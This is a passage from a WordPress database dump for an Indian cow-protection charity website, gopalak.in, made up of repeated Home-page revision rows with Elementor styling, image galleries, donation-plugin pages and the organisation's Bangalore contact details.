a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 11:48:50','2022-10-14 06:18:50','',1373,'https://gopalak.in/?p=1763',0,'revision','',0),(1764,1,'2022-10-14 11:48:50','2022-10-14 06:18:50','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 11:48:50','2022-10-14 06:18:50','',1373,'https://gopalak.in/?p=1764',0,'revision','',0),(1765,1,'2022-10-14 11:48:50','2022-10-14 06:18:50','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 11:48:50','2022-10-14 06:18:50','',1373,'https://gopalak.in/?p=1765',0,'revision','',0),(1766,1,'2022-10-14 11:50:47','2022-10-14 06:20:47','','cattle feed','','inherit','closed','closed','','1755-autosave-v1','','','2022-10-14 11:50:47','2022-10-14 06:20:47','',1755,'https://gopalak.in/?p=1766',0,'revision','',0),(1767,1,'2022-10-14 12:55:45','0000-00-00 00:00:00','[wcdp_donation_form]','Elementor #1767','','draft','closed','closed','','','','','2022-10-14 12:55:45','2022-10-14 07:25:45','',0,'https://gopalak.in/?page_id=1767',0,'page','',0),(1768,1,'2022-10-14 12:09:01','2022-10-14 06:39:01','','Elementor #1767','','inherit','closed','closed','','1767-revision-v1','','','2022-10-14 12:09:01','2022-10-14 06:39:01','',1767,'https://gopalak.in/?p=1768',0,'revision','',0),(1769,1,'2022-10-14 12:30:38','2022-10-14 07:00:38','[give_receipt]','Donation Confirmation','','publish','closed','closed','','donation-confirmation','','','2022-10-14 12:30:38','2022-10-14 07:00:38','',0,'https://gopalak.in/donation-confirmation/',0,'page','',0),(1770,1,'2022-10-14 12:30:38','2022-10-14 07:00:38','We&#039;re sorry, your donation failed to process. Please try again or contact site support.','Donation Failed','','publish','closed','closed','','donation-failed','','','2022-10-14 12:30:38','2022-10-14 07:00:38','',0,'https://gopalak.in/donation-failed/',0,'page','',0),(1771,1,'2022-10-14 12:30:39','2022-10-14 07:00:39','<!-- wp:give/donor-dashboard {\"align\":\"wide\"} /-->','Donor Dashboard','','publish','close','close','','donor-dashboard','','','2022-10-14 12:30:39','2022-10-14 07:00:39','',0,'https://gopalak.in/donor-dashboard/',0,'page','',0),(1772,1,'2022-10-14 12:30:39','2022-10-14 07:00:39','[give_receipt]','Donation Confirmation','','publish','closed','closed','','donation-confirmation-2','','','2022-10-14 12:30:39','2022-10-14 07:00:39','',0,'https://gopalak.in/donation-confirmation-2/',0,'page','',0),(1773,1,'2022-10-14 12:30:39','2022-10-14 07:00:39','We&#039;re sorry, your donation failed to process. Please try again or contact site support.','Donation Failed','','publish','closed','closed','','donation-failed-2','','','2022-10-14 12:30:39','2022-10-14 07:00:39','',0,'https://gopalak.in/donation-failed-2/',0,'page','',0),(1774,1,'2022-10-14 12:31:16','2022-10-14 07:01:16','','Donation Form','','publish','closed','closed','','donation-form','','','2022-10-14 12:31:16','2022-10-14 07:01:16','',0,'https://gopalak.in/donations/donation-form/',0,'give_forms','',0),(1775,1,'2022-10-14 13:03:24','2022-10-14 07:33:24','','abc','','publish','closed','closed','','abc','','','2022-10-14 15:13:30','2022-10-14 09:43:30','',0,'https://gopalak.in/?post_type=product&#038;p=1775',0,'product','',0),(1781,1,'2022-10-14 14:52:10','2022-10-14 09:22:10','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 14:52:10','2022-10-14 09:22:10','',1373,'https://gopalak.in/?p=1781',0,'revision','',0),(1782,1,'2022-10-14 14:52:11','2022-10-14 09:22:11','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a 